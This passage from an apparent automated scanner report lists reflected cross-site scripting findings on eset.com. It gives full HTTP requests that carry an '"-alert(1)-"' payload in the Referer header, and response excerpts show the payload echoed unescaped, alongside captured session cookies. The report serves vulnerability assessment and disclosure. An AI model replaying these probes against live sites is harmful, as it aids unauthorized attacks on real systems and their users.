Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=3de70"-alert(1)-"aff7b074c41

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18192
Date: Sun, 17 Apr 2011 14:15:46 GMT
X-Varnish: 1858169194
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>I
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=3de70"-alert(1)-"aff7b074c41";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.19. http://www.eset.com/us/home/compare-eset-to-competition [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/compare-eset-to-competition

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eb46"-alert(1)-"bea4f5a8167 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/home/compare-eset-to-competition HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=3eb46"-alert(1)-"bea4f5a8167

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 24659
Date: Sun, 17 Apr 2011 14:15:46 GMT
X-Varnish: 1858169234
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=3eb46"-alert(1)-"bea4f5a8167";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.20. http://www.eset.com/us/home/nod32-antivirus [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/nod32-antivirus

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45768"-alert(1)-"5ab3639d88d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/home/nod32-antivirus HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=45768"-alert(1)-"5ab3639d88d

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25489
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169293
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>N
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=45768"-alert(1)-"5ab3639d88d";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.21. http://www.eset.com/us/home/smart-security [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdaa1"-alert(1)-"a109434bb74 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=fdaa1"-alert(1)-"a109434bb74

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25578
Date: Sun, 17 Apr 2011 14:15:47 GMT
X-Varnish: 1858169311
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=fdaa1"-alert(1)-"a109434bb74";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.22. http://www.eset.com/us/online-scanner [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/online-scanner

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa10d"-alert(1)-"394143401d1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/online-scanner HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=fa10d"-alert(1)-"394143401d1

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=5si1qqo03relg5cpdnrm3fe981; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20733
Date: Sun, 17 Apr 2011 12:55:03 GMT
X-Varnish: 1857986391
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=fa10d"-alert(1)-"394143401d1";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.23. http://www.eset.com/us/online-scanner/run [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/online-scanner/run

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87b2c"-alert(1)-"4bfc395c0f4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/online-scanner/run HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=87b2c"-alert(1)-"4bfc395c0f4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 3923
Date: Sun, 17 Apr 2011 12:59:38 GMT
X-Varnish: 1857996580
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
pageName="Online Scanner - Other Browser";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=87b2c"-alert(1)-"4bfc395c0f4";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.24. http://www.eset.com/us/partners [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4c89"-alert(1)-"905792298ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=c4c89"-alert(1)-"905792298ce

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13874
Date: Sun, 17 Apr 2011 14:15:48 GMT
X-Varnish: 1858169361
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Partners";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=c4c89"-alert(1)-"905792298ce";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.25. http://www.eset.com/us/partners/worldwide-partners [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/partners/worldwide-partners

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f790"-alert(1)-"2951c1a0ee7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/partners/worldwide-partners HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=9f790"-alert(1)-"2951c1a0ee7

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 23135
Date: Sun, 17 Apr 2011 14:15:50 GMT
X-Varnish: 1858169476
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
the next lines. */
s.pageName="";
s.server="";
s.channel="Partners";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=9f790"-alert(1)-"2951c1a0ee7";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.26. http://www.eset.com/us/press-center [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/press-center

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d7e3"-alert(1)-"3cfb654df82 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/press-center HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=9d7e3"-alert(1)-"3cfb654df82

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18385
Date: Sun, 17 Apr 2011 14:15:48 GMT
X-Varnish: 1858169352
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=9d7e3"-alert(1)-"3cfb654df82";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.27. http://www.eset.com/us/renew [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/renew

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bf9"-alert(1)-"12531d7b5ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/renew HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=91bf9"-alert(1)-"12531d7b5ed

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 18993
Date: Sun, 17 Apr 2011 14:15:49 GMT
X-Varnish: 1858169396
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>R
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=91bf9"-alert(1)-"12531d7b5ed";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

1.28. http://www.eset.com/us/rss [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/rss

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f54"-alert(1)-"0b6f004dd10 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

